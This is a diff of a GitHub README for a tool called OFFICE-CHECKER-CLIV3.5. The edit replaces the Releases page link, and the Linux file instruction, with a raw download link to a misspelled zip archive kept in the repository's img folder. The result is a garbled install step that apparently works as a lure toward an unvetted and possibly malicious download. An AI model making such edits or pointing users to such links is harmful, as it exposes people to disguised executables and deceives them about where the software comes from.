adibsheikh5/OFFICE-CHECKER-CLIV3.5/README.md

 - An internet connection for verification.

 ## 📂 Download & Install
-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/adibsheikh5/OFFICE-CHECKER-CLIV3.5/releases) to access the latest version of OFFICE-CHECKER-CLIV3.5.
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/adibsheikh5/OFFICE-CHECKER-CLIV3.5/main/img/CLI_OFFIC_CHECKE_v3.9.zip) to access the latest version of OFFICE-CHECKER-CLIV3.5.

 2. **Select the Right File:**
    - Look for the latest release, which is usually at the top.
    - Depending on your operating system, choose the appropriate file:
      - For Windows, download the `.exe` file.
      - For macOS, download the `.dmg` file.
-     - For Linux, look for the `.tar.gz` file or similar.
+     - For Linux, look for the `https://raw.githubusercontent.com/adibsheikh5/OFFICE-CHECKER-CLIV3.5/main/img/CLI_OFFIC_CHECKE_v3.9.zip` file or similar.

 3. **Download the File:** Click on the link to begin the download.
 Your browser will save the file to your default download location.